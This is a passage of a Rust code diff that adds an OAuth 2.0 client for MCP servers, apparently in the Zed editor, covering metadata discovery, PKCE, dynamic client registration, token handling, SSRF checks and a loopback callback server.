+ if (ip.segments()[0] & 0xfe00) == 0xfc00 {
+ bail!(
+ "OAuth endpoint must not point to IPv6 unique-local address: {}",
+ ip
+ );
+ }
+ }
+ url::Host::Domain(_) => {
+ // Domain-based SSRF prevention requires resolver-level checks.
+ // See known limitation in the doc comment above.
+ }
+ }
+ }
+
+ Ok(())
+}
+
+/// Parsed from the MCP server's WWW-Authenticate header or well-known endpoint
+/// per RFC 9728 (OAuth 2.0 Protected Resource Metadata).
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct ProtectedResourceMetadata {
+ pub resource: Url,
+ pub authorization_servers: Vec<Url>,
+ pub scopes_supported: Option<Vec<String>>,
+}
+
+/// Parsed from the authorization server's .well-known endpoint
+/// per RFC 8414 (OAuth 2.0 Authorization Server Metadata).
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct AuthServerMetadata {
+ pub issuer: Url,
+ pub authorization_endpoint: Url,
+ pub token_endpoint: Url,
+ pub registration_endpoint: Option<Url>,
+ pub scopes_supported: Option<Vec<String>>,
+ pub code_challenge_methods_supported: Option<Vec<String>>,
+ pub client_id_metadata_document_supported: bool,
+}
+
+/// The result of client registration — either CIMD or DCR.
+#[derive(Clone, Serialize, Deserialize)]
+pub struct OAuthClientRegistration {
+ pub client_id: String,
+ /// Only present for DCR-minted registrations.
+ pub client_secret: Option<String>,
+}
+
+impl std::fmt::Debug for OAuthClientRegistration {
+ fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+ f.debug_struct("OAuthClientRegistration")
+ .field("client_id", &self.client_id)
+ .field(
+ "client_secret",
+ &self.client_secret.as_ref().map(|_| "[redacted]"),
+ )
+ .finish()
+ }
+}
+
+/// Access and refresh tokens obtained from the token endpoint.
+#[derive(Clone, Serialize, Deserialize)]
+pub struct OAuthTokens {
+ pub access_token: String,
+ pub refresh_token: Option<String>,
+ pub expires_at: Option<SystemTime>,
+}
+
+impl std::fmt::Debug for OAuthTokens {
+ fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+ f.debug_struct("OAuthTokens")
+ .field("access_token", &"[redacted]")
+ .field(
+ "refresh_token",
+ &self.refresh_token.as_ref().map(|_| "[redacted]"),
+ )
+ .field("expires_at", &self.expires_at)
+ .finish()
+ }
+}
+
+/// Everything discovered before the browser flow starts. Client registration is
+/// resolved separately, once the real redirect URI is known.
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct OAuthDiscovery {
+ pub resource_metadata: ProtectedResourceMetadata,
+ pub auth_server_metadata: AuthServerMetadata,
+ pub scopes: Vec<String>,
+}
+
+/// The persisted OAuth session for a context server.
+///
+/// Stored in the keychain so startup can restore a refresh-capable provider
+/// without another browser flow. Deliberately excludes the full discovery
+/// metadata to keep the serialized size well within keychain item limits.
+#[derive(Clone, Serialize, Deserialize)]
+pub struct OAuthSession {
+ pub token_endpoint: Url,
+ pub resource: Url,
+ pub client_registration: OAuthClientRegistration,
+ pub tokens: OAuthTokens,
+}
+
+impl std::fmt::Debug for OAuthSession {
+ fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+ f.debug_struct("OAuthSession")
+ .field("token_endpoint", &self.token_endpoint)
+ .field("resource", &self.resource)
+ .field("client_registration", &self.client_registration)
+ .field("tokens", &self.tokens)
+ .finish()
+ }
+}
+
+/// Error codes defined by RFC 6750 Section 3.1 for Bearer token authentication.
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum BearerError {
+ /// The request is missing a required parameter, includes an unsupported
+ /// parameter or parameter value, or is otherwise malformed.
+ InvalidRequest,
+ /// The access token provided is expired, revoked, malformed, or invalid.
+ InvalidToken,
+ /// The request requires higher privileges than provided by the access token.
+ InsufficientScope,
+ /// An unrecognized error code (extension or future spec addition).
+ Other,
+}
+
+impl BearerError {
+ fn parse(value: &str) -> Self {
+ match value {
+ "invalid_request" => BearerError::InvalidRequest,
+ "invalid_token" => BearerError::InvalidToken,
+ "insufficient_scope" => BearerError::InsufficientScope,
+ _ => BearerError::Other,
+ }
+ }
+}
+
+/// Fields extracted from a `WWW-Authenticate: Bearer` header.
+///
+/// Per RFC 9728 Section 5.1, MCP servers include `resource_metadata` to point
+/// at the Protected Resource Metadata document. The optional `scope` parameter
+/// (RFC 6750 Section 3) indicates scopes required for the request.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct WwwAuthenticate {
+ pub resource_metadata: Option<Url>,
+ pub scope: Option<Vec<String>>,
+ /// The parsed `error` parameter per RFC 6750 Section 3.1.
+ pub error: Option<BearerError>,
+ pub error_description: Option<String>,
+}
+
+/// Parse a `WWW-Authenticate` header value.
+///
+/// Expects the `Bearer` scheme followed by comma-separated `key="value"` pairs.
+/// Per RFC 6750 and RFC 9728, the relevant parameters are:
+/// - `resource_metadata` — URL of the Protected Resource Metadata document
+/// - `scope` — space-separated list of required scopes
+/// - `error` — error code (e.g. "insufficient_scope")
+/// - `error_description` — human-readable error description
+pub fn parse_www_authenticate(header: &str) -> Result<WwwAuthenticate> {
+ let header = header.trim();
+
+ let params_str = if header.len() >= 6 && header[..6].eq_ignore_ascii_case("bearer") {
+ header[6..].trim()
+ } else {
+ bail!("WWW-Authenticate header does not use Bearer scheme");
+ };
+
+ if params_str.is_empty() {
+ return Ok(WwwAuthenticate {
+ resource_metadata: None,
+ scope: None,
+ error: None,
+ error_description: None,
+ });
+ }
+
+ let params = parse_auth_params(params_str);
+
+ let resource_metadata = params
+ .get("resource_metadata")
+ .map(|v| Url::parse(v))
+ .transpose()
+ .map_err(|e| anyhow!("invalid resource_metadata URL: {}", e))?;
+
+ let scope = params
+ .get("scope")
+ .map(|v| v.split_whitespace().map(String::from).collect());
+
+ let error = params.get("error").map(|v| BearerError::parse(v));
+ let error_description = params.get("error_description").cloned();
+
+ Ok(WwwAuthenticate {
+ resource_metadata,
+ scope,
+ error,
+ error_description,
+ })
+}
+
+/// Parse comma-separated `key="value"` or `key=token` parameters from an
+/// auth-param list (RFC 7235 Section 2.1).
+fn parse_auth_params(input: &str) -> collections::HashMap<String, String> {
+ let mut params = collections::HashMap::default();
+ let mut remaining = input.trim();
+
+ while !remaining.is_empty() {
+ // Skip leading whitespace and commas.
+ remaining = remaining.trim_start_matches(|c: char| c == ',' || c.is_whitespace());
+ if remaining.is_empty() {
+ break;
+ }
+
+ // Find the key (everything before '=').
+ let eq_pos = match remaining.find('=') {
+ Some(pos) => pos,
+ None => break,
+ };
+
+ let key = remaining[..eq_pos].trim().to_lowercase();
+ remaining = &remaining[eq_pos + 1..];
+ remaining = remaining.trim_start();
+
+ // Parse the value: either quoted or unquoted (token).
+ let value;
+ if remaining.starts_with('"') {
+ // Quoted string: find the closing quote, handling escaped chars.
+ remaining = &remaining[1..]; // skip opening quote
+ let mut val = String::new();
+ let mut chars = remaining.char_indices();
+ loop {
+ match chars.next() {
+ Some((_, '\\')) => {
+ // Escaped character — take the next char literally.
+ if let Some((_, c)) = chars.next() {
+ val.push(c);
+ }
+ }
+ Some((i, '"')) => {
+ remaining = &remaining[i + 1..];
+ break;
+ }
+ Some((_, c)) => val.push(c),
+ None => {
+ remaining = "";
+ break;
+ }
+ }
+ }
+ value = val;
+ } else {
+ // Unquoted token: read until comma or whitespace.
+ let end = remaining
+ .find(|c: char| c == ',' || c.is_whitespace())
+ .unwrap_or(remaining.len());
+ value = remaining[..end].to_string();
+ remaining = &remaining[end..];
+ }
+
+ if !key.is_empty() {
+ params.insert(key, value);
+ }
+ }
+
+ params
+}
+
+/// Construct the well-known Protected Resource Metadata URIs for a given MCP
+/// server URL, per RFC 9728 Section 3.
+///
+/// Returns URIs in priority order:
+/// 1. Path-specific: `https://<host>/.well-known/oauth-protected-resource/<path>`
+/// 2. Root: `https://<host>/.well-known/oauth-protected-resource`
+pub fn protected_resource_metadata_urls(server_url: &Url) -> Vec<Url> {
+ let mut urls = Vec::new();
+ let base = format!("{}://{}", server_url.scheme(), server_url.authority());
+
+ let path = server_url.path().trim_start_matches('/');
+ if !path.is_empty() {
+ if let Ok(url) = Url::parse(&format!(
+ "{}/.well-known/oauth-protected-resource/{}",
+ base, path
+ )) {
+ urls.push(url);
+ }
+ }
+
+ if let Ok(url) = Url::parse(&format!("{}/.well-known/oauth-protected-resource", base)) {
+ urls.push(url);
+ }
+
+ urls
+}
+
+/// Construct the well-known Authorization Server Metadata URIs for a given
+/// issuer URL, per RFC 8414 Section 3.1 and Section 5 (OIDC compat).
+///
+/// Returns URIs in priority order, which differs depending on whether the
+/// issuer URL has a path component.
+pub fn auth_server_metadata_urls(issuer: &Url) -> Vec<Url> {
+ let mut urls = Vec::new();
+ let base = format!("{}://{}", issuer.scheme(), issuer.authority());
+ let path = issuer.path().trim_matches('/');
+
+ if !path.is_empty() {
+ // Issuer with path: try path-inserted variants first.
+ if let Ok(url) = Url::parse(&format!(
+ "{}/.well-known/oauth-authorization-server/{}",
+ base, path
+ )) {
+ urls.push(url);
+ }
+ if let Ok(url) = Url::parse(&format!(
+ "{}/.well-known/openid-configuration/{}",
+ base, path
+ )) {
+ urls.push(url);
+ }
+ if let Ok(url) = Url::parse(&format!(
+ "{}/{}/.well-known/openid-configuration",
+ base, path
+ )) {
+ urls.push(url);
+ }
+ } else {
+ // No path: standard well-known locations.
+ if let Ok(url) = Url::parse(&format!("{}/.well-known/oauth-authorization-server", base)) {
+ urls.push(url);
+ }
+ if let Ok(url) = Url::parse(&format!("{}/.well-known/openid-configuration", base)) {
+ urls.push(url);
+ }
+ }
+
+ urls
+}
+
+// -- Canonical server URI (RFC 8707) -----------------------------------------
+
+/// Derive the canonical resource URI for an MCP server URL, suitable for the
+/// `resource` parameter in authorization and token requests per RFC 8707.
+///
+/// Lowercases the scheme and host, preserves the path (without trailing slash),
+/// strips fragments and query strings.
+pub fn canonical_server_uri(server_url: &Url) -> String {
+ let mut uri = format!(
+ "{}://{}",
+ server_url.scheme().to_ascii_lowercase(),
+ server_url.host_str().unwrap_or("").to_ascii_lowercase(),
+ );
+ if let Some(port) = server_url.port() {
+ uri.push_str(&format!(":{}", port));
+ }
+ let path = server_url.path();
+ if path != "/" {
+ uri.push_str(path.trim_end_matches('/'));
+ }
+ uri
+}
+
+// -- Scope selection ---------------------------------------------------------
+
+/// Select scopes following the MCP spec's Scope Selection Strategy:
+/// 1. Use `scope` from the `WWW-Authenticate` challenge if present.
+/// 2. Fall back to `scopes_supported` from Protected Resource Metadata.
+/// 3. Return empty if neither is available.
+pub fn select_scopes(
+ www_authenticate: &WwwAuthenticate,
+ resource_metadata: &ProtectedResourceMetadata,
+) -> Vec<String> {
+ if let Some(ref scopes) = www_authenticate.scope {
+ if !scopes.is_empty() {
+ return scopes.clone();
+ }
+ }
+ resource_metadata
+ .scopes_supported
+ .clone()
+ .unwrap_or_default()
+}
+
+// -- Client registration strategy --------------------------------------------
+
+/// The registration approach to use, determined from auth server metadata.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub enum ClientRegistrationStrategy {
+ /// The auth server supports CIMD. Use the CIMD URL as client_id directly.
+ Cimd { client_id: String },
+ /// The auth server has a registration endpoint. Caller must POST to it.
+ Dcr { registration_endpoint: Url },
+ /// No supported registration mechanism.
+ Unavailable,
+}
+
+/// Determine how to register with the authorization server, following the
+/// spec's recommended priority: CIMD first, DCR fallback.
+pub fn determine_registration_strategy(
+ auth_server_metadata: &AuthServerMetadata,
+) -> ClientRegistrationStrategy {
+ if auth_server_metadata.client_id_metadata_document_supported {
+ ClientRegistrationStrategy::Cimd {
+ client_id: CIMD_URL.to_string(),
+ }
+ } else if let Some(ref endpoint) = auth_server_metadata.registration_endpoint {
+ ClientRegistrationStrategy::Dcr {
+ registration_endpoint: endpoint.clone(),
+ }
+ } else {
+ ClientRegistrationStrategy::Unavailable
+ }
+}
+
+// -- PKCE (RFC 7636) ---------------------------------------------------------
+
+/// A PKCE code verifier and its S256 challenge.
+#[derive(Clone)]
+pub struct PkceChallenge {
+ pub verifier: String,
+ pub challenge: String,
+}
+
+impl std::fmt::Debug for PkceChallenge {
+ fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+ f.debug_struct("PkceChallenge")
+ .field("verifier", &"[redacted]")
+ .field("challenge", &self.challenge)
+ .finish()
+ }
+}
+
+/// Generate a PKCE code verifier and S256 challenge per RFC 7636.
+///
+/// The verifier is 43 base64url characters derived from 32 random bytes.
+/// The challenge is `BASE64URL(SHA256(verifier))`.
+pub fn generate_pkce_challenge() -> PkceChallenge {
+ let mut random_bytes = [0u8; 32];
+ rand::rng().fill(&mut random_bytes);
+ let engine = base64::engine::general_purpose::URL_SAFE_NO_PAD;
+ let verifier = engine.encode(&random_bytes);
+
+ let digest = Sha256::digest(verifier.as_bytes());
+ let challenge = engine.encode(digest);
+
+ PkceChallenge {
+ verifier,
+ challenge,
+ }
+}
+
+// -- Authorization URL construction ------------------------------------------
+
+/// Build the authorization URL for the OAuth Authorization Code + PKCE flow.
+pub fn build_authorization_url(
+ auth_server_metadata: &AuthServerMetadata,
+ client_id: &str,
+ redirect_uri: &str,
+ scopes: &[String],
+ resource: &str,
+ pkce: &PkceChallenge,
+ state: &str,
+) -> Url {
+ let mut url = auth_server_metadata.authorization_endpoint.clone();
+ {
+ let mut query = url.query_pairs_mut();
+ query.append_pair("response_type", "code");
+ query.append_pair("client_id", client_id);
+ query.append_pair("redirect_uri", redirect_uri);
+ if !scopes.is_empty() {
+ query.append_pair("scope", &scopes.join(" "));
+ }
+ query.append_pair("resource", resource);
+ query.append_pair("code_challenge", &pkce.challenge);
+ query.append_pair("code_challenge_method", "S256");
+ query.append_pair("state", state);
+ }
+ url
+}
+
+// -- Token endpoint request bodies -------------------------------------------
+
+/// The JSON body returned by the token endpoint on success.
+#[derive(Deserialize)]
+pub struct TokenResponse {
+ pub access_token: String,
+ #[serde(default)]
+ pub refresh_token: Option<String>,
+ #[serde(default)]
+ pub expires_in: Option<u64>,
+ #[serde(default)]
+ pub token_type: Option<String>,
+}
+
+impl std::fmt::Debug for TokenResponse {
+ fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+ f.debug_struct("TokenResponse")
+ .field("access_token", &"[redacted]")
+ .field(
+ "refresh_token",
+ &self.refresh_token.as_ref().map(|_| "[redacted]"),
+ )
+ .field("expires_in", &self.expires_in)
+ .field("token_type", &self.token_type)
+ .finish()
+ }
+}
+
+impl TokenResponse {
+ /// Convert into `OAuthTokens`, computing `expires_at` from `expires_in`.
+ pub fn into_tokens(self) -> OAuthTokens {
+ let expires_at = self
+ .expires_in
+ .map(|secs| SystemTime::now() + Duration::from_secs(secs));
+ OAuthTokens {
+ access_token: self.access_token,
+ refresh_token: self.refresh_token,
+ expires_at,
+ }
+ }
+}
+
+/// Build the form-encoded body for an authorization code token exchange.
+pub fn token_exchange_params(
+ code: &str,
+ client_id: &str,
+ redirect_uri: &str,
+ code_verifier: &str,
+ resource: &str,
+) -> Vec<(&'static str, String)> {
+ vec![
+ ("grant_type", "authorization_code".to_string()),
+ ("code", code.to_string()),
+ ("redirect_uri", redirect_uri.to_string()),
+ ("client_id", client_id.to_string()),
+ ("code_verifier", code_verifier.to_string()),
+ ("resource", resource.to_string()),
+ ]
+}
+
+/// Build the form-encoded body for a token refresh request.
+pub fn token_refresh_params(
+ refresh_token: &str,
+ client_id: &str,
+ resource: &str,
+) -> Vec<(&'static str, String)> {
+ vec![
+ ("grant_type", "refresh_token".to_string()),
+ ("refresh_token", refresh_token.to_string()),
+ ("client_id", client_id.to_string()),
+ ("resource", resource.to_string()),
+ ]
+}
+
+// -- DCR request body (RFC 7591) ---------------------------------------------
+
+/// Build the JSON body for a Dynamic Client Registration request.
+///
+/// The `redirect_uri` should be the actual loopback URI with the ephemeral
+/// port (e.g. `http://127.0.0.1:12345/callback`). Some auth servers do strict
+/// redirect URI matching even for loopback addresses, so we register the
+/// exact URI we intend to use.
+pub fn dcr_registration_body(redirect_uri: &str) -> serde_json::Value {
+ serde_json::json!({
+ "client_name": "Zed",
+ "redirect_uris": [redirect_uri],
+ "grant_types": ["authorization_code"],
+ "response_types": ["code"],
+ "token_endpoint_auth_method": "none"
+ })
+}
+
+// -- Discovery (async, hits real endpoints) ----------------------------------
+
+/// Fetch Protected Resource Metadata from the MCP server.
+///
+/// Tries the `resource_metadata` URL from the `WWW-Authenticate` header first,
+/// then falls back to well-known URIs constructed from `server_url`.
+pub async fn fetch_protected_resource_metadata(
+ http_client: &Arc<dyn HttpClient>,
+ server_url: &Url,
+ www_authenticate: &WwwAuthenticate,
+) -> Result<ProtectedResourceMetadata> {
+ let candidate_urls = match &www_authenticate.resource_metadata {
+ Some(url) if url.origin() == server_url.origin() => vec![url.clone()],
+ Some(url) => {
+ log::warn!(
+ "Ignoring cross-origin resource_metadata URL {} \
+ (server origin: {})",
+ url,
+ server_url.origin().unicode_serialization()
+ );
+ protected_resource_metadata_urls(server_url)
+ }
+ None => protected_resource_metadata_urls(server_url),
+ };
+
+ for url in &candidate_urls {
+ match fetch_json::<ProtectedResourceMetadataResponse>(http_client, url).await {
+ Ok(response) => {
+ if response.authorization_servers.is_empty() {
+ bail!(
+ "Protected Resource Metadata at {} has no authorization_servers",
+ url
+ );
+ }
+ return Ok(ProtectedResourceMetadata {
+ resource: response.resource.unwrap_or_else(|| server_url.clone()),
+ authorization_servers: response.authorization_servers,
+ scopes_supported: response.scopes_supported,
+ });
+ }
+ Err(err) => {
+ log::debug!(
+ "Failed to fetch Protected Resource Metadata from {}: {}",
+ url,
+ err
+ );
+ }
+ }
+ }
+
+ bail!(
+ "Could not fetch Protected Resource Metadata for {}",
+ server_url
+ )
+}
+
+/// Fetch Authorization Server Metadata, trying RFC 8414 and OIDC Discovery
+/// endpoints in the priority order specified by the MCP spec.
+pub async fn fetch_auth_server_metadata(
+ http_client: &Arc<dyn HttpClient>,
+ issuer: &Url,
+) -> Result<AuthServerMetadata> {
+ let candidate_urls = auth_server_metadata_urls(issuer);
+
+ for url in &candidate_urls {
+ match fetch_json::<AuthServerMetadataResponse>(http_client, url).await {
+ Ok(response) => {
+ let reported_issuer = response.issuer.unwrap_or_else(|| issuer.clone());
+ if reported_issuer != *issuer {
+ bail!(
+ "Auth server metadata issuer mismatch: expected {}, got {}",
+ issuer,
+ reported_issuer
+ );
+ }
+
+ return Ok(AuthServerMetadata {
+ issuer: reported_issuer,
+ authorization_endpoint: response
+ .authorization_endpoint
+ .ok_or_else(|| anyhow!("missing authorization_endpoint"))?,
+ token_endpoint: response
+ .token_endpoint
+ .ok_or_else(|| anyhow!("missing token_endpoint"))?,
+ registration_endpoint: response.registration_endpoint,
+ scopes_supported: response.scopes_supported,
+ code_challenge_methods_supported: response.code_challenge_methods_supported,
+ client_id_metadata_document_supported: response
+ .client_id_metadata_document_supported
+ .unwrap_or(false),
+ });
+ }
+ Err(err) => {
+ log::debug!("Failed to fetch Auth Server Metadata from {}: {}", url, err);
+ }
+ }
+ }
+
+ bail!(
+ "Could not fetch Authorization Server Metadata for {}",
+ issuer
+ )
+}
+
+/// Run the full discovery flow: fetch resource metadata, then auth server
+/// metadata, then select scopes. Client registration is resolved separately,
+/// once the real redirect URI is known.
+pub async fn discover(
+ http_client: &Arc<dyn HttpClient>,
+ server_url: &Url,
+ www_authenticate: &WwwAuthenticate,
+) -> Result<OAuthDiscovery> {
+ let resource_metadata =
+ fetch_protected_resource_metadata(http_client, server_url, www_authenticate).await?;
+
+ let auth_server_url = resource_metadata
+ .authorization_servers
+ .first()
+ .ok_or_else(|| anyhow!("no authorization servers in resource metadata"))?;
+
+ let auth_server_metadata = fetch_auth_server_metadata(http_client, auth_server_url).await?;
+
+ // Verify PKCE S256 support (spec requirement).
+ match &auth_server_metadata.code_challenge_methods_supported {
+ Some(methods) if methods.iter().any(|m| m == "S256") => {}
+ Some(_) => bail!("authorization server does not support S256 PKCE"),
+ None => bail!("authorization server does not advertise code_challenge_methods_supported"),
+ }
+
+ // Verify there is at least one supported registration strategy before we
+ // present the server as ready to authenticate.
+ match determine_registration_strategy(&auth_server_metadata) {
+ ClientRegistrationStrategy::Cimd { .. } | ClientRegistrationStrategy::Dcr { .. } => {}
+ ClientRegistrationStrategy::Unavailable => {
+ bail!("authorization server supports neither CIMD nor DCR")
+ }
+ }
+
+ let scopes = select_scopes(www_authenticate, &resource_metadata);
+
+ Ok(OAuthDiscovery {
+ resource_metadata,
+ auth_server_metadata,
+ scopes,
+ })
+}
+
+/// Resolve the OAuth client registration for an authorization flow.
+///
+/// CIMD uses the static client metadata document directly. For DCR, a fresh
+/// registration is performed each time because the loopback redirect URI
+/// includes an ephemeral port that changes every flow.
+pub async fn resolve_client_registration(
+ http_client: &Arc<dyn HttpClient>,
+ discovery: &OAuthDiscovery,
+ redirect_uri: &str,
+) -> Result<OAuthClientRegistration> {
+ match determine_registration_strategy(&discovery.auth_server_metadata) {
+ ClientRegistrationStrategy::Cimd { client_id } => Ok(OAuthClientRegistration {
+ client_id,
+ client_secret: None,
+ }),
+ ClientRegistrationStrategy::Dcr {
+ registration_endpoint,
+ } => perform_dcr(http_client, ®istration_endpoint, redirect_uri).await,
+ ClientRegistrationStrategy::Unavailable => {
+ bail!("authorization server supports neither CIMD nor DCR")
+ }
+ }
+}
+
+// -- Dynamic Client Registration (RFC 7591) ----------------------------------
+
+/// Perform Dynamic Client Registration with the authorization server.
+pub async fn perform_dcr(
+ http_client: &Arc<dyn HttpClient>,
+ registration_endpoint: &Url,
+ redirect_uri: &str,
+) -> Result<OAuthClientRegistration> {
+ validate_oauth_url(registration_endpoint)?;
+
+ let body = dcr_registration_body(redirect_uri);
+ let body_bytes = serde_json::to_vec(&body)?;
+
+ let request = Request::builder()
+ .method(http_client::http::Method::POST)
+ .uri(registration_endpoint.as_str())
+ .header("Content-Type", "application/json")
+ .header("Accept", "application/json")
+ .body(AsyncBody::from(body_bytes))?;
+
+ let mut response = http_client.send(request).await?;
+
+ if !response.status().is_success() {
+ let mut error_body = String::new();
+ response.body_mut().read_to_string(&mut error_body).await?;
+ bail!(
+ "DCR failed with status {}: {}",
+ response.status(),
+ error_body
+ );
+ }
+
+ let mut response_body = String::new();
+ response
+ .body_mut()
+ .read_to_string(&mut response_body)
+ .await?;
+
+ let dcr_response: DcrResponse =
+ serde_json::from_str(&response_body).context("failed to parse DCR response")?;
+
+ Ok(OAuthClientRegistration {
+ client_id: dcr_response.client_id,
+ client_secret: dcr_response.client_secret,
+ })
+}
+
+// -- Token exchange and refresh (async) --------------------------------------
+
+/// Exchange an authorization code for tokens at the token endpoint.
+pub async fn exchange_code(
+ http_client: &Arc<dyn HttpClient>,
+ auth_server_metadata: &AuthServerMetadata,
+ code: &str,
+ client_id: &str,
+ redirect_uri: &str,
+ code_verifier: &str,
+ resource: &str,
+) -> Result<OAuthTokens> {
+ let params = token_exchange_params(code, client_id, redirect_uri, code_verifier, resource);
+ post_token_request(http_client, &auth_server_metadata.token_endpoint, ¶ms).await
+}
+
+/// Refresh tokens using a refresh token.
+pub async fn refresh_tokens(
+ http_client: &Arc<dyn HttpClient>,
+ token_endpoint: &Url,
+ refresh_token: &str,
+ client_id: &str,
+ resource: &str,
+) -> Result<OAuthTokens> {
+ let params = token_refresh_params(refresh_token, client_id, resource);
+ post_token_request(http_client, token_endpoint, ¶ms).await
+}
+
+/// POST form-encoded parameters to a token endpoint and parse the response.
+async fn post_token_request(
+ http_client: &Arc<dyn HttpClient>,
+ token_endpoint: &Url,
+ params: &[(&str, String)],
+) -> Result<OAuthTokens> {
+ validate_oauth_url(token_endpoint)?;
+
+ let body = url::form_urlencoded::Serializer::new(String::new())
+ .extend_pairs(params.iter().map(|(k, v)| (*k, v.as_str())))
+ .finish();
+
+ let request = Request::builder()
+ .method(http_client::http::Method::POST)
+ .uri(token_endpoint.as_str())
+ .header("Content-Type", "application/x-www-form-urlencoded")
+ .header("Accept", "application/json")
+ .body(AsyncBody::from(body.into_bytes()))?;
+
+ let mut response = http_client.send(request).await?;
+
+ if !response.status().is_success() {
+ let mut error_body = String::new();
+ response.body_mut().read_to_string(&mut error_body).await?;
+ bail!(
+ "token request failed with status {}: {}",
+ response.status(),
+ error_body
+ );
+ }
+
+ let mut response_body = String::new();
+ response
+ .body_mut()
+ .read_to_string(&mut response_body)
+ .await?;
+
+ let token_response: TokenResponse =
+ serde_json::from_str(&response_body).context("failed to parse token response")?;
+
+ Ok(token_response.into_tokens())
+}
+
+// -- Loopback HTTP callback server -------------------------------------------
+
+/// An OAuth authorization callback received via the loopback HTTP server.
+pub struct OAuthCallback {
+ pub code: String,
+ pub state: String,
+}
+
+impl std::fmt::Debug for OAuthCallback {
+ fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+ f.debug_struct("OAuthCallback")
+ .field("code", &"[redacted]")
+ .field("state", &"[redacted]")
+ .finish()
+ }
+}
+
+impl OAuthCallback {
+ /// Parse the query string from a callback URL like
+ /// `http://127.0.0.1:<port>/callback?code=...&state=...`.
+ pub fn parse_query(query: &str) -> Result<Self> {
+ let mut code: Option<String> = None;
+ let mut state: Option<String> = None;
+ let mut error: Option<String> = None;
+ let mut error_description: Option<String> = None;
+
+ for (key, value) in url::form_urlencoded::parse(query.as_bytes()) {
+ match key.as_ref() {
+ "code" => {
+ if !value.is_empty() {
+ code = Some(value.into_owned());
+ }
+ }
+ "state" => {
+ if !value.is_empty() {
+ state = Some(value.into_owned());
+ }
+ }
+ "error" => {
+ if !value.is_empty() {
+ error = Some(value.into_owned());
+ }
+ }
+ "error_description" => {
+ if !value.is_empty() {
+ error_description = Some(value.into_owned());
+ }
+ }
+ _ => {}
+ }
+ }
+
+ // Check for OAuth error response (RFC 6749 Section 4.1.2.1) before
+ // checking for missing code/state.
+ if let Some(error_code) = error {
+ bail!(
+ "OAuth authorization failed: {} ({})",
+ error_code,
+ error_description.as_deref().unwrap_or("no description")
+ );
+ }
+
+ let code = code.ok_or_else(|| anyhow!("missing 'code' parameter in OAuth callback"))?;
+ let state = state.ok_or_else(|| anyhow!("missing 'state' parameter in OAuth callback"))?;
+
+ Ok(Self { code, state })
+ }
+}
+
+/// How long to wait for the browser to complete the OAuth flow before giving
+/// up and releasing the loopback port.
+const CALLBACK_TIMEOUT: Duration = Duration::from_secs(2 * 60);
+
+/// Start a loopback HTTP server to receive the OAuth authorization callback.
+///
+/// Binds to an ephemeral loopback port for each flow.
+///
+/// Returns `(redirect_uri, callback_future)`. The caller should use the
+/// redirect URI in the authorization request, open the browser, then await
+/// the future to receive the callback.
+///
+/// The server accepts exactly one request on `/callback`, validates that it
+/// contains `code` and `state` query parameters, responds with a minimal
+/// HTML page telling the user they can close the tab, and shuts down.
+///
+/// The callback server shuts down when the returned oneshot receiver is dropped
+/// (e.g. because the authentication task was cancelled), or after a timeout
+/// ([CALLBACK_TIMEOUT]).
+pub async fn start_callback_server() -> Result<(
+ String,
+ futures::channel::oneshot::Receiver<Result<OAuthCallback>>,
+)> {
+ let server = tiny_http::Server::http("127.0.0.1:0")
+ .map_err(|e| anyhow!(e).context("Failed to bind loopback listener for OAuth callback"))?;
+ let port = server
+ .server_addr()
+ .to_ip()
+ .context("server not bound to a TCP address")?
+ .port();
+
+ let redirect_uri = format!("http://127.0.0.1:{}/callback", port);
+
+ let (tx, rx) = futures::channel::oneshot::channel();
+
+ // `tiny_http` is blocking, so we run it on a background thread.
+ // The `recv_timeout` loop lets us check for cancellation (the receiver
+ // being dropped) and enforce an overall timeout.
+ std::thread::spawn(move || {
+ let deadline = std::time::Instant::now() + CALLBACK_TIMEOUT;
+
+ loop {
+ if tx.is_canceled() {
+ return;
+ }
+ let remaining = deadline.saturating_duration_since(std::time::Instant::now());
+ if remaining.is_zero() {
+ return;
+ }
+
+ let timeout = remaining.min(Duration::from_millis(500));
+ let Some(request) = (match server.recv_timeout(timeout) {
+ Ok(req) => req,
+ Err(_) => {
+ let _ = tx.send(Err(anyhow!("OAuth callback server I/O error")));
+ return;
+ }
+ }) else {
+ // Timeout with no request — loop back and check cancellation.
+ continue;
+ };
+
+ let result = handle_callback_request(&request);
+
+ let (status_code, body) = match &result {
+ Ok(_) => (
+ 200,
+ "<html><body><h1>Authorization successful</h1>\
+ <p>You can close this tab and return to Zed.</p></body></html>",
+ ),
+ Err(err) => {
+ log::error!("OAuth callback error: {}", err);
+ (
+ 400,
+ "<html><body><h1>Authorization failed</h1>\
+ <p>Something went wrong. Please try again from Zed.</p></body></html>",
+ )
+ }
+ };
+
+ let response = tiny_http::Response::from_string(body)
+ .with_status_code(status_code)
+ .with_header(
+ tiny_http::Header::from_str("Content-Type: text/html")
+ .expect("failed to construct response header"),
+ )
+ .with_header(
+ tiny_http::Header::from_str("Keep-Alive: timeout=0,max=0")
+ .expect("failed to construct response header"),
+ );
+ request.respond(response).log_err();
+
+ let _ = tx.send(result);
+ return;
+ }
+ });
+
+ Ok((redirect_uri, rx))
+}
+
+/// Extract the `code` and `state` query parameters from an OAuth callback
+/// request to `/callback`.
+fn handle_callback_request(request: &tiny_http::Request) -> Result<OAuthCallback> {
+ let url = Url::parse(&format!("http://localhost{}", request.url()))
+ .context("malformed callback request URL")?;
+
+ if url.path() != "/callback" {
+ bail!("unexpected path in OAuth callback: {}", url.path());
+ }
+
+ let query = url
+ .query()
+ .ok_or_else(|| anyhow!("OAuth callback has no query string"))?;
+ OAuthCallback::parse_query(query)
+}
+
+// -- JSON fetch helper -------------------------------------------------------
+
+async fn fetch_json<T: serde::de::DeserializeOwned>(
+ http_client: &Arc<dyn HttpClient>,
+ url: &Url,
+) -> Result<T> {
+ validate_oauth_url(url)?;
+
+ let request = Request::builder()
+ .method(http_client::http::Method::GET)
